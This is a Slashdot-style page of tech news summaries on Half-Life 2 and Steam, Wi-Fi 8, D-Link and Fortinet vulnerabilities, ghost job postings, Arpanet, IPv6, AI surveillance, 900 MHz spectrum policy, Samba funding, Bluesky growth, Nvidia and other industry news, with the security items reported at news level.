First Person Shooters (Games)

Half-Life 2 Celebrates 20th Anniversary (arstechnica.com) 48

Each day leading up through the 16th (the official day Half-Life 2 was launched), Ars Technica will be publishing a new article looking back at the game and its impact. Here's an excerpt from an article published today by Ars Technica's Kyle Orland: When millions of eager gamers first installed Half-Life 2 20 years ago, many, if not most, of them found they needed to install another piece of software alongside it. Few at the time could imagine that piece of companion software -- with the pithy name Steam -- would eventually become the key distribution point and social networking center for the entire PC gaming ecosystem, making the idea of physical PC games an anachronism in the process.

While Half-Life 2 wasn't the first Valve game released on Steam, it was the first high-profile title to require the platform, even for players installing the game from physical retail discs. That requirement gave Valve access to millions of gamers with new Steam accounts and helped the company bypass traditional retail publishers of the day by directly marketing and selling its games (and, eventually, games from other developers). But 2004-era Steam also faced a vociferous backlash from players who saw the software as a piece of nuisance DRM (digital rights management) that did little to justify its existence at the time.
In honor of the anniversary, Orbifold Studios released a new Half-Life 2 RTX trailer. "[T]his is a remastering project that leverages the technologies of NVIDIA's RTX Remix and has the blessing of the original developer, Valve," reports Wccftech. "Orbifold Studios, a team of experienced modders, was founded specifically to bring this project to fruition." It's unclear when exactly this project will be finished.

Nvidia is also giving away a custom Half-Life 2 themed RTX 480 Super Founders Edition.
Wireless Networking

Wi-Fi 8 Trades Speed For a More Reliable Experience (pcworld.com) 57

Wi-Fi 8 (also known as IEEE 802.11bn Ultra High Reliability) is expected to arrive around 2028, prioritizing an enhanced user experience over speed by optimizing interactions between devices and access points. While it retains similar bandwidth specifications as the previous standard, Wi-Fi 8 aims to improve network efficiency, reducing interference and congestion for a more reliable and adaptive connection. PCWorld's Mark Hachman reports: As of Nov. 2024, MediaTek believes that Wi-Fi 8 will look virtually identical to Wi-Fi 7 in several key areas: The maximum physical layer (PHY) rate will be the same at 2,880Mbps x 8, or 23Gbits/s. It will also use the same four frequency bands (2, 4, 5, and 6GHz) and the same 4096 QAM modulation across a maximum channel bandwidth of 320MHz. (A Wi-Fi 8 router won't get 23Gbps of bandwidth, of course. According to MediaTek, the actual peak throughput in a "clean," or laboratory, environment is just 80 percent or so of the hypothetical peak throughput, and actual, real-world results can be far less.)

Still, put simply, Wi-Fi 8 should deliver the same wireless bandwidth as Wi-Fi 7, using the same channels and the same modulation. Every Wi-Fi standard has also been backwards-compatible with its predecessors, too. What Wi-Fi 8 will do, though, is change how your client device, such as a PC or a phone, interacts with multiple access points. Think of this as an evolution of how your laptop talks to your home's networking equipment. Over time, Wi-Fi has evolved from communications between one laptop and a router, across a single channel. Channel hopping routed different clients to different bands. When Wi-Fi 6 was developed, a dedicated 6GHz channel was added, sometimes as a dedicated "backhaul" between your home's access points. Now, mesh networks are more common, giving your laptop a variety of access points, channels, and frequencies to select between.
For a detailed breakdown of the upcoming advancements coming to Wi-Fi 8, including Coordinated Spatial Reuse, Coordinated Beamforming, and Dynamic Sub-Channel Operation, read the full article.
Security

D-Link Won't Fix Critical Flaw Affecting 60,000 Older NAS Devices 87

D-Link confirmed no fix will be issued for the over 60,000 D-Link NAS devices that are vulnerable to a critical command injection flaw (CVE-2024-10914), allowing unauthenticated attackers to execute arbitrary commands through unsanitized HTTP requests. The networking company advises users to retire or isolate the affected devices from public internet access. BleepingComputer reports: The flaw impacts multiple models of D-Link network-attached storage (NAS) devices that are commonly used by small businesses: DNS-320 Version 1.00; DNS-320LW Version 1.01.0914.2012; DNS-325 Version 1.01, Version 1.02; and DNS-340L Version 1.08. [...] A search that Netsecfish conducted on the FOFA platform returned 61,147 results at 41,097 unique IP addresses for D-Link devices vulnerable to CVE-2024-10914.

In a security bulletin today, D-Link has confirmed that a fix for CVE-2024-10914 is not coming and the vendor recommends that users retire vulnerable products. If that is not possible at the moment, users should at least isolate them from the public internet or place them under stricter access conditions. The same researcher discovered in April this year an arbitrary command injection and hardcoded backdoor flaw, tracked as CVE-2024-3273, impacting mostly the same D-Link NAS models as the latest flaw.
Businesses

Ghost Jobs Are Wreaking Havoc On Tech Workers (sfgate.com) 90

An anonymous reader quotes a report from SFGATE: If you've recently been laid off and have started the arduous process of looking for a new job, you've probably seen them on networking platforms like LinkedIn: postings for roles that are 30 days old, maybe more, with suspiciously wide salary ranges. They usually have hundreds, or even thousands, of hopeful applicants vying for the same position, but if you do a quick cross-check and notice that the role isn't posted on the company's actual website -- or any of their social media pages -- you should probably stop drafting that cover letter, because it's possible they're not hiring at all. "Ghost jobs," or ads for positions that aren't actually open, are a common phenomenon in the tech industry, which has been plagued by layoffs and budget cuts over recent years. As unemployed workers struggle to regain their footing, recruiters and career coaches who spoke with SFGATE warned that these fake jobs posted by real companies serve multiple, sometimes insidious purposes.

According to a 2024 survey from MyPerfectResume, 81% of recruiters admitted to posting ads for positions that were fake or already filled. While some respondents said employers did it to maintain a presence on job boards and build a talent pool, it's also used to commit psychological warfare: 25% said ghost jobs helped companies gauge how replaceable their employees were, while 23% said it helped make the company appear more stable during a hiring freeze. Another damning 2024 report from Resume Builder said that 62% companies posted them specifically to make their employees feel replaceable. They also made ads to "trick overworked employees" into believing that more people would be brought on to alleviate their overwhelming workload.

After interviewing 1,641 hiring managers, Resume Builder researchers found that 40% of employers posted fake job listings in 2024, and that three in 10 currently had ghost jobs listed. The idea to post them mostly trickled down from HR, followed by senior management and executives, their June 2024 article continued. Though the listings were posted on multiple hiring platforms, the majority of them appeared on LinkedIn and the companies' websites. Evidence suggests this trend is taking hold throughout the Bay Area, too. A collaborative document circulating online reveals a growing list of employers accused of posting ghost jobs. Many of them, it turns out, are tech companies with offices based in California.

Networking

BBC Interviews Charley Kline and Bill Duvall, Creators of Arpanet (bbc.com) 26

The BBC interviewed scientists Charley Kline and Bill Duvall 55 years after the first communications were made over a system called Arpanet, short for the Advanced Research Projects Agency Network. "Kline and Duvall were early inventors of networking, networks that would ultimately lead to what is today the Internet," writes longtime Slashdot reader dbialac. "Duvall had basic ideas what might come of the networks, but they had no idea of how much of a phenomenon it would turn into." Here's an excerpt from the interview: BBC: What did you expect Arpanet to become?
Duvall: "I saw the work we were doing at SRI as a critical part of a larger vision, that of information workers connected to each other and sharing problems, observations, documents and solutions. What we did not see was the commercial adoption nor did we anticipate the phenomenon of social media and the associated disinformation plague. Although, it should be noted, that in [SRI computer scientist] Douglas Engelbart's 1962 treatise describing the overall vision, he notes that the capabilities we were creating would trigger profound change in our society, and it would be necessary to simultaneously use and adapt the tools we were creating to address the problems which would arise from their use in society."

What aspects of the internet today remind you of Arpanet?
Duvall: Referring to the larger vision which was being created in Engelbart's group (the mouse, full screen editing, links, etc.), the internet today is a logical evolution of those ideas enhanced, of course, by the contributions of many bright and innovative people and organisations.

Kline: The ability to use resources from others. That's what we do when we use a website. We are using the facilities of the website and its programs, features, etc. And, of course, email. The Arpanet pretty much created the concept of routing and multiple paths from one site to another. That got reliability in case a communication line failed. It also allowed increases in communication speeds by using multiple paths simultaneously. Those concepts have carried over to the internet. Today, the site of the first internet transmission at UCLA's Boetler Hally Room 3420 functions as a monument to technology history (Credit: Courtesy of UCLA) As we developed the communications protocols for the Arpanet, we discovered problems, redesigned and improved the protocols and learned many lessons that carried over to the Internet. TCP/IP [the basic standard for internet connection] was developed both to interconnect networks, in particular the Arpanet with other networks, and also to improve performance, reliability and more.

How do you feel about this anniversary?
Kline: That's a mix. Personally, I feel it is important, but a little overblown. The Arpanet and what sprang from it are very important. This particular anniversary to me is just one of many events. I find somewhat more important than this particular anniversary were the decisions by Arpa to build the Network and continue to support its development.

Duvall: It's nice to remember the origin of something like the internet, but the most important thing is the enormous amount of work that has been done since that time to turn it into what is a major part of societies worldwide.

Network

IPv6 May Already Be Irrelevant - But So is Moving Off IPv4, Argues APNIC's Chief Scientist (theregister.com) 213

The chief scientist of the Asia Pacific Network Information Center has a theory about why the world hasn't moved to IPv6. From a report: In a lengthy post to the center's blog, Geoff Huston recounts that the main reason for the development of IPv6 was a fear the world would run out of IP addresses, hampering the growth of the internet. But IPv6 represented evolution -- not revolution. "The bottom line was that IPv6 did not offer any new functionality that was not already present in IPv4. It did not introduce any significant changes to the operation of IP. It was just IP, with larger addresses," Huston wrote.

IPv6's designers assumed that the protocol would take off because demand for IPv4 was soaring. But in the years after IPv6 debuted, Huston observes, "There was no need to give the transition much thought." Internetworking wonks assumed applications, hosts, and networks would become dual stack and support IPv6 alongside IPv4, before phasing out the latter. But then mobile internet usage exploded, and network operators had to scale to meet unprecedented demand created by devices like the iPhone. "We could either concentrate our resources on meeting the incessant demands of scaling, or we could work on IPv6 deployment," Huston wrote.

Security

How WatchTowr Explored the Complexity of a Vulnerability in a Secure Firewall Appliance (watchtowr.com) 9

Cybersecurity startup Watchtowr "was founded by hacker-turned-entrepreneur Benjamin Harris," according to a recent press release touting their Fortune 500 customers and $29 million investments from venture capital firms. ("If there's a way to compromise your organization, watchTowr will find it," Harris says in the announcement.)

This week they shared their own research on a Fortinet FortiGate SSLVPN appliance vulnerability (discovered in February by Gwendal Guégniaud of the Fortinet Product Security team — presumably in a static analysis for format string vulnerabilities). "It affected (before patching) all currently-maintained branches, and recently was highlighted by CISA as being exploited-in-the-wild... It's a Format String vulnerability [that] quickly leads to Remote Code Execution via one of many well-studied mechanisms, which we won't reproduce here..."

"Tl;dr SSLVPN appliances are still sUpEr sEcurE," their post begains — but the details are interesting. When trying to test an exploit, Watchtowr discovered instead that FortiGate always closed the connection early, thanks to an exploit mitigation in glibc "intended to hinder clean exploitation of exactly this vulnerability class." Watchtowr hoped to "use this to very easily check if a device is patched — we can simply send a %n, and if the connection aborts, the device is vulnerable. If the connection does not abort, then we know the device has been patched... " But then they discovered "Fortinet added some kind of certificate validation logic in the 7.4 series, meaning that we can't even connect to it (let alone send our payload) without being explicitly permitted by a device administrator." We also checked the 7.0 branch, and here we found things even more interesting, as an unpatched instance would allow us to connect with a self-signed certificate, while a patched machine requires a certificate signed by a configured CA. We did some reversing and determined that the certificate must be explicitly configured by the administrator of the device, which limits exploitation of these machines to the managing FortiManager instance (which already has superuser permissions on the device) or the other component of a high-availability pair. It is not sufficient to present a certificate signed by a public CA, for example...

Fortinet's advice here is simply to update, which is always sound advice, but doesn't really communicate the nuance of this vulnerability... Assuming an organisation is unable to apply the supplied workaround, the urgency of upgrade is largely dictated by the willingness of the target to accept a self-signed certificate. Targets that will do so are open to attack by any host that can access them, while those devices that require a certificate signed by a trusted root are rendered unexploitable in all but the narrowest of cases (because the TLS/SSL ecosystem is just so solid, as we recently demonstrated)...

While it's always a good idea to update to the latest version, the life of a sysadmin is filled with cost-to-benefit analysis, juggling the needs of users with their best interests.... [I]t is somewhat troubling when third parties need to reverse patches to uncover such details.

Thanks to Slashdot reader Mirnotoriety for sharing the article.
United States

The Pentagon Wants To Use AI To Create Deepfake Internet Users (theintercept.com) 83

schwit1 writes: The Department of Defense wants technology so it can fabricate online personas that are indistinguishable from real people.

The United States' secretive Special Operations Command is looking for companies to help create deepfake internet users so convincing that neither humans nor computers will be able to detect they are fake, according to a procurement document reviewed by The Intercept.

The plan, mentioned in a new 76-page wish list by the Department of Defense's Joint Special Operations Command, or JSOC, outlines advanced technologies desired for country's most elite, clandestine military efforts. "Special Operations Forces (SOF) are interested in technologies that can generate convincing online personas for use on social media platforms, social networking sites, and other online content," the entry reads.

Network

Cisco Is Abandoning the LoRaWAN Space With No Lifeboat For IoT Customers 37

Cisco is exiting the LoRaWAN market for IoT device connectivity, with no migration plans for customers. "LoRaWAN is a low power, wide area network specification, specifically designed to connect devices such as sensors over relatively long distances," notes The Register. "It is built on LoRa, a form of wireless communication that uses spread spectrum modulation, and makes use of license-free sub-gigahertz industrial, scientific, and medical (ISM) radio bands. The tech is overseen by the LoRa Alliance." From the report: Switchzilla made this information public in a notice on its website announcing the end-of-sale and end-of-life dates for Cisco LoRaWAN. The last day customers will be able to order any affected products will be January 1, 2025, with all support ceasing by the end of the decade. The list includes Cisco's 800 MHz and 900 MHz LoRaWAN Gateways, plus associated products such as omni-directional antennas and software for the Gateways and Interface Modules. If anyone was in any doubt, the notification spells it out: "Cisco will be exiting the LoRaWAN space. There is no planned migration for Cisco LoRaWAN gateways."
Programming

'Compile and Run C in JavaScript', Promises Bun (thenewstack.io) 54

The JavaScript runtime Bun is a Node.js/Deno alternative (that's also a bundler/test runner/package manager).

And Bun 1.1.28 now includes experimental support for ">compiling and running native C from JavaScript, according to this report from The New Stack: "From compression to cryptography to networking to the web browser you're reading this on, the world runs on C," wrote Jarred Sumner, creator of Bun. "If it's not written in C, it speaks the C ABI (C++, Rust, Zig, etc.) and is available as a C library. C and the C ABI are the past, present, and future of systems programming." This is a low-boilerplate way to use C libraries and system libraries from JavaScript, he said, adding that this feature allows the same project that runs JavaScript to also run C without a separate build step... "It's good for glue code that binds C or C-like libraries to JavaScript. Sometimes, you want to use a C library or system API from JavaScript, and that library was never meant to be used from JavaScript," Sumner added.

It's currently possible to achieve this by compiling to WebAssembly or writing a N-API (napi) addon or V8 C++ API library addon, the team explained. But both are suboptimal... WebAssembly can do this but its isolated memory model comes with serious tradeoffs, the team wrote, including an inability to make system calls and a requirement to clone everything. "Modern processors support about 280 TB of addressable memory (48 bits). WebAssembly is 32-bit and can only access its own memory," Sumner wrote. "That means by default, passing strings and binary data JavaScript WebAssembly must clone every time. For many projects, this negates any performance gain from leveraging WebAssembly."

The latest version of Bun, released Friday, builds on this by adding N-API (nap) support to cc [Bun's C compiler, which uses TinyCC to compile the C code]. "This makes it easier to return JavaScript strings, objects, arrays and other non-primitive values from C code," wrote Sumner. "You can continue to use types like int, float, double to send & receive primitive values from C code, but now you can also use N-API types! Also, this works when using dlopen to load shared libraries with bun:ffi (such as Rust or C++ libraries with C ABI exports)....

"TinyCC compiles to decently performant C, but it won't do advanced optimizations that Clang or GCC does like autovectorization or very specialized CPU instructions," Sumner wrote. "You probably won't get much of a performance gain from micro-optimizing small parts of your codebase through C, but happy to be proven wrong!"

Businesses

Cisco's Second Layoff of 2024 Affects Thousands of Employees (techcrunch.com) 25

U.S. tech giant Cisco has let go of thousands of employees following its second layoff of 2024. From a report: The technology and networking company announced in August that it would reduce its headcount by 7%, or around 5,600 employees, following an earlier layoff in February, in which the company let go of about 4,000 employees. As TechCrunch previously reported, Cisco employees said that the company refused to say who was affected by the layoffs until September 16. Cisco did not give a reason for the month-long delay in notifying affected staff. One employee told TechCrunch at the time that Cisco's workplace had become the "most toxic environment" they had worked in. TechCrunch has learned that the layoffs also affect Talos Security, the company's threat intelligence and security research unit.
AI

Ellison Declares Oracle 'All In' On AI Mass Surveillance 114

Oracle cofounder Larry Ellison envisions AI as the backbone of a new era of mass surveillance, positioning Oracle as a key player in AI infrastructure through its unique networking architecture and partnerships with AWS and Microsoft. The Register reports: Ellison made the comments near the end of an hour-long chat at the Oracle financial analyst meeting last week during a question and answer session in which he painted Oracle as the AI infrastructure player to beat in light of its recent deals with AWS and Microsoft. Many companies, Ellison touted, build AI models at Oracle because of its "unique networking architecture," which dates back to the database era.

"AI is hot, and databases are not," he said, making Oracle's part of the puzzle less sexy, but no less important, at least according to the man himself - AI systems have to have well-organized data, or else they won't be that valuable. The fact that some of the biggest names in cloud computing (and Elon Musk's Grok) have turned to Oracle to run their AI infrastructure means it's clear that Oracle is doing something right, claimed now-CTO Ellison. "If Elon and Satya [Nadella] want to pick us, that's a good sign - we have tech that's valuable and differentiated," Ellison said, adding: One of the ideal uses of that differentiated offering? Maximizing AI's pubic security capabilities.

"The police will be on their best behavior because we're constantly watching and recording everything that's going on," Ellison told analysts. He described police body cameras that were constantly on, with no ability for officers to disable the feed to Oracle. Even requesting privacy for a bathroom break or a meal only meant sections of recording would require a subpoena to view - not that the video feed was ever stopped. AI would be trained to monitor officer feeds for anything untoward, which Ellison said could prevent abuse of police power and save lives. [...] "Citizens will be on their best behavior because we're constantly recording and reporting," Ellison added, though it's not clear what he sees as the source of those recordings - police body cams or publicly placed security cameras. "There are so many opportunities to exploit AI," he said.
Electronic Frontier Foundation

EFF Decries 'Brazen Land-Grab' Attempt on 900 MHz 'Commons' Frequency Used By Amateur Radio (eff.org) 145

An EFF article calls out a "brazen attempt to privatize" a wireless frequency band (900 MHz) which America's FCC's left " as a commons for all... for use by amateur radio operators, unlicensed consumer devices, and industrial, scientific, and medical equipment." The spectrum has also become "a hotbed for new technologies and community-driven projects. Millions of consumer devices also rely on the range, including baby monitors, cordless phones, IoT devices, garage door openers." But NextNav would rather claim these frequencies, fence them off, and lease them out to mobile service providers. This is just another land-grab by a corporate rent-seeker dressed up as innovation. EFF and hundreds of others have called on the FCC to decisively reject this proposal and protect the open spectrum as a commons that serves all.

NextNav [which sells a geolocation service] wants the FCC to reconfigure the 902-928 MHz band to grant them exclusive rights to the majority of the spectrum... This proposal would not only give NextNav their own lane, but expanded operating region, increased broadcasting power, and more leeway for radio interference emanating from their portions of the band. All of this points to more power for NextNav at everyone else's expense.

This land-grab is purportedly to implement a Positioning, Navigation and Timing (PNT) network to serve as a US-specific backup of the Global Positioning System(GPS). This plan raises red flags off the bat. Dropping the "global" from GPS makes it far less useful for any alleged national security purposes, especially as it is likely susceptible to the same jamming and spoofing attacks as GPS. NextNav itself admits there is also little commercial demand for PNT. GPS works, is free, and is widely supported by manufacturers. If Nextnav has a grand plan to implement a new and improved standard, it was left out of their FCC proposal. What NextNav did include however is its intent to resell their exclusive bandwidth access to mobile 5G networks. This isn't about national security or innovation; it's about a rent-seeker monopolizing access to a public resource. If NextNav truly believes in their GPS backup vision, they should look to parts of the spectrum already allocated for 5G.

The open sections of the 900 MHz spectrum are vital for technologies that foster experimentation and grassroots innovation. Amateur radio operators, developers of new IoT devices, and small-scale operators rely on this band. One such project is Meshtastic, a decentralized communication tool that allows users to send messages across a network without a central server. This new approach to networking offers resilient communication that can endure emergencies where current networks fail. This is the type of innovation that actually addresses crises raised by Nextnav, and it's happening in the part of the spectrum allocated for unlicensed devices while empowering communities instead of a powerful intermediary. Yet, this proposal threatens to crush such grassroots projects, leaving them without a commons in which they can grow and improve.

This isn't just about a set of frequencies. We need an ecosystem which fosters grassroots collaboration, experimentation, and knowledge building. Not only do these commons empower communities, they avoid a technology monoculture unable to adapt to new threats and changing needs as technology progresses. Invention belongs to the public, not just to those with the deepest pockets. The FCC should ensure it remains that way.

NextNav's proposal is a direct threat to innovation, public safety, and community empowerment. While FCC comments on the proposal have closed, replies remain open to the public until September 20th. The FCC must reject this corporate land-grab and uphold the integrity of the 900 MHz band as a commons.

Networking

'Samba' Networking Protocol Project Gets Big Funding from the German Sovereign Tech Fund (samba.plus) 33

Samba is "a free software re-implementation of the SMB networking protocol," according to Wikipedia. And now the Samba project "has secured significant funding (€688,800.00) from the German Sovereign Tech Fund to advance the project," writes Jeremy Allison — Sam (who is Slashdot reader #8,157 — and also a long standing member of Samba's core team): The investment was successfully applied for by [information security service provider] SerNet. Over the next 18 months, Samba developers from SerNet will tackle 17 key development subprojects aimed at enhancing Samba's security, scalability, and functionality.

The Sovereign Tech Fund is a German federal government funding program that supports the development, improvement, and maintenance of open digital infrastructure. Their goal is to sustainably strengthen the open source ecosystem.

The project's focus is on areas like SMB3 Transparent Failover, SMB3 UNIX extensions, SMB-Direct, Performance and modern security protocols such as SMB over QUIC. These improvements are designed to ensure that Samba remains a robust and secure solution for organizations that rely on a sovereign IT infrastructure. Development work began as early as September the 1st and is expected to be completed by the end of February 2026 for all sub-projects.

All development will be done in the open following the existing Samba development process. First gitlab CI pipelines have already been running and gitlab MRs will appear soon!

Back in 2000, Jeremy Allison answered questions from Slashdot readers about Samba.

Allison is now a board member at both the GNOME Foundation and the Software Freedom Conservancy, a distinguished engineer at Rocky Linux creator CIQ, and a long-time free software advocate.
Security

Fortinet Confirms Data Breach After Hacker Claims To Steal 440GB of Files (bleepingcomputer.com) 25

Cybersecurity giant Fortinet has confirmed it suffered a data breach after a threat actor claimed to steal 440GB of files from the company's Microsoft Sharepoint server. From a report: Fortinet is one of the largest cybersecurity companies in the world, selling secure networking products like firewalls, routers, and VPN devices. The company also offers SIEM, network management, and EDR/XDR solutions, as well as consulting services.

Early this morning, a threat actor posted to a hacking forum that they had stolen 440GB of data from Fortinet's Azure Sharepoint instance. The threat actor then shared credentials to an alleged S3 bucket where the stolen data is stored for other threat actors to download. The threat actor, known as "Fortibitch," claims to have tried to extort Fortinet into paying a ransom, likely to prevent the publishing of data, but the company refused to pay. In response to our questions about incident, Fortinet confirmed that customer data was stolen from a "third-party cloud-based shared file drive."

Media

Bluesky Lets You Post Videos Now (theverge.com) 5

Bluesky, the decentralized social networking startup, has introduced support for videos up to 60 seconds long in its latest update, version 1.91. The Verge reports: The videos will autoplay by default, but Bluesky says you can turn this feature off in the settings menu. You can also add subtitles to your videos, as well as apply labels for things like adult content. There are some limitations to Bluesky's video feature, as the platform will only allow up to 25 video uploads (or 10GB of video) per day.

To protect Bluesky from harmful content or spam, it will require users to verify their email addresses before posting a video. Bluesky may also take away someone's ability to post videos if they repeatedly violate its community guidelines. The platform will also run videos through Hive, an AI moderation solution, and Thorn, a nonprofit that fights child sexual abuse, to check for illegal content or media that needs a warning.

Social Networks

Bluesky Adds 2 Million New Users After Brazil's X Ban (techcrunch.com) 94

In the days following Brazil's shutdown of X, the decentralized social networking startup Bluesky added over 2 million new users, up from just half a million as of Friday. "This rapid growth led some users to encounter the occasional error that would state there were 'Not Enough Resources' to handle requests, as Bluesky engineers scrambled to keep the servers stable under the influx of new sign-ups," reports TechCrunch's Sarah Perez. From the report: As new users downloaded the app, Bluesky jumped to becoming the app to No. 1 in Brazil over the weekend, ahead of Meta's X competitor, Instagram Threads. According to app intelligence firm Appfigures, Bluesky's total downloads soared by 10,584% this weekend compared to last, and its downloads in Brazil were up by a whopping 1,018,952%. The growth seems to be having a halo effect, as downloads outside Brazil also rose by 584%, the firm noted. In part, this is due to Bluesky receiving downloads in 22 countries where it had barely seen any traction before.

In terms of absolute downloads, countries that saw the most installs outside Brazil included the U.S., Portugal, the U.K., Canada and Spain. Those with the most download growth, however, were Portugal, Chile, Argentina, Colombia and Romania. Most of the latter group jumped from single-digit growth to growth in the thousands. Bluesky's newcomers have actively engaged on the platform, too, driving up other key metrics.

As one Bluesky engineer remarked, the number of likes on the social network grew to 104.6 million over the past four-day period, up from just 13 million when compared with a similar period just a week ago. Follows also grew from 1.4 million to 100.8 million while reposts grew from 1.3 million to 11 million. As of Monday, Bluesky said it had added 2.11 million users during the past four days, up from 26,000 users it had added in the week-ago period. In addition, the company noted it had seen "significantly more than a 100% [daily active users] increase." On Tuesday, Bluesky told TechCrunch the number is now 2.4 million and continues to grow "by the minute."

Technology

Nvidia Takes an Added Role Amid AI Craze: Data-Center Designer (msn.com) 24

Nvidia dominates the chips at the center of the AI boom. It wants to conquer almost everything else that makes those chips tick, too. From a report: Chief Executive Jensen Huang is increasingly broadening his company's focus -- and seeking to widen its advantage over competitors -- by offering software, data-center design services and networking technology in addition to its powerful silicon brains. More than a supplier of a valuable hardware component, he is trying to build Nvidia into a one-stop shop for all the key elements in the data centers where tools like OpenAI's ChatGPT are created and deployed -- or what he calls "AI factories."

Huang emphasized Nvidia's growing prowess at data-center design following an earnings report Wednesday that exceeded Wall Street forecasts. The report came days after rival AMD agreed to pay nearly $5 billion to buy data-center design and manufacturing company ZT Systems to try to gain ground on Nvidia. "We have the ability fairly uniquely to integrate to design an AI factory because we have all the parts," Huang said in a call with analysts. "It's not possible to come up with a new AI factory every year unless you have all the parts." It is a strategy designed to extend the business success that has made Nvidia one of the world's most valuable companies -- and to insulate it from rivals eager to eat into its AI-chip market share, estimated at more than 80%. Gobbling up more of the value in AI data centers both adds revenue and makes its offerings stickier for customers.

[...] Nvidia is building on the effectiveness of its 17-year-old proprietary software, called CUDA, which enables programmers to use its chips. More recently, Huang has been pushing resources into a superfast networking protocol called InfiniBand, after acquiring the technology's main equipment maker, Mellanox Technologies, five years ago for nearly $7 billion. Analysts estimate that InfiniBand is used in most AI-training deployments. Nvidia is also building a business that supplies AI-optimized Ethernet, a form of networking widely used in traditional data centers. The Ethernet business is expected to generate billions of dollars in revenue within a year, Chief Financial Officer Colette Kress said Wednesday. More broadly, Nvidia sells products including central processors and networking chips for a range of other data-center equipment that is fine-tuned to work seamlessly together.

Social Networks

'Uncertainty' Drives LinkedIn To Migrate From CentOS To Azure Linux (theregister.com) 79

The Register's Liam Proven reports: Microsoft's in-house professional networking site is moving to Microsoft's in-house Linux. This could mean that big changes are coming for the former CBL-Mariner distro. Ievgen Priadka's post on the LinkedIn Engineering blog, titled Navigating the transition: adopting Azure Linux as LinkedIn's operating system, is the visible sign of what we suspect has been a massive internal engineering effort. It describes some of the changes needed to migrate what the post calls "most of our fleet" from the end-of-life CentOS 7 to Microsoft Azure Linux -- the distro that grew out of and replaced its previous internal distro, CBL-Mariner.

This is an important stage in a long process. Microsoft acquired LinkedIn way back in 2016. Even so, as recently as the end of last year, we reported that a move to Azure had been abandoned, which came a few months after it laid off almost 700 LinkedIn staff -- the majority in R&D. The blog post is over 3,500 words long, so there's quite a lot to chew on -- and we're certain that this has been passed through and approved by numerous marketing and management people and scoured of any potentially embarrassing admissions. Some interesting nuggets remain, though. We enjoyed the modest comment that: "However, with the shift to CentOS Stream, users felt uncertain about the project's direction and the timeline for updates. This uncertainty created some concerns about the reliability and support of CentOS as an operating system." [...]

There are some interesting technical details in the post too. It seems LinkedIn is running on XFS -- also the RHEL default file system, of course -- with the notable exception of Hadoop, and so the Azure Linux team had to add XFS support. Some CentOS and actual RHEL is still used in there somewhere. That fits perfectly with using any of the RHELatives. However, the post also mentions that the team developed a tool to aid with deploying via MaaS, which it explicitly defines as Metal as a Service. MaaS is a Canonical service, although it does support other distros -- so as well as CentOS, there may have been some Ubuntu in the LinkedIn stack as well. Some details hint at what we suspect were probably major deployment headaches. [...] Some of the other information covers things the teams did not do, which is equally informative. [...]

The Internet

Quantum Internet Prototype Runs For 15 Days Under New York City (phys.org) 27

Under the streets of New York City, they're testing a "quantum network," reports Phys.org — where engineers from a Brooklyn company named Qunnect Inc are taking steps to "overcome the fragility of entangled states in a fiber cable and ensure the efficiency of signal delivery." For their prototype network, the Qunnect researchers used a leased 34-kilometer-long fiber circuit they called the GothamQ loop. Using polarization-entangled photons, they operated the loop for 15 continuous days, achieving an uptime of 99.84% and a compensation fidelity of 99% for entangled photon pairs transmitted at a rate of about 20,000 per second. At a half-million entangled photon pairs per second, the fidelity was still nearly 90%...

They sent 1,324 nm polarization-entangled photon pairs in quantum superpositions through the fiber, one state with both polarizations horizontal and the other with both vertical — a two-qubit configuration more generally known as a Bell state. In such a superposition, the quantum mechanical photon pairs are in both states at the same time.

"While others have transmitted entangled photons before, there has been too much noise and polarization drift in the fiber environment for entanglement to survive," the article points out, "particularly in a long-term stable network." So the Qunnect team built "automated polarization compensation" devices to correct the polarization of the entangled pairs: In their design, an infrared photon [with a wavelength of 1,324 nanometers] is entangled with a near-infrared photon of 795 nanometers. The latter photon is compatible in wavelength and bandwidth with the rubidium atomic systems, such as are used in quantum memories and quantum processors. It was found that polarization drift was both wavelength- and time-dependent, requiring Qunnect to design and build equipment for active compensation at the same wavelengths...

Qunnect's GothamQ loop demonstration was especially noteworthy for its duration, the hands-off nature of the operation time, and its uptime percentage. It showed, they wrote, "progress toward a fully automated practical entanglement network" that would be required for a quantum internet.

And Qunnect's co-founder/chief science officer says "since we finished this work, we have already made all the parts rack-mounted, so they can be used everywhere..."

Their network design and results are published in PRX Quantum.

Slashdot Top Deals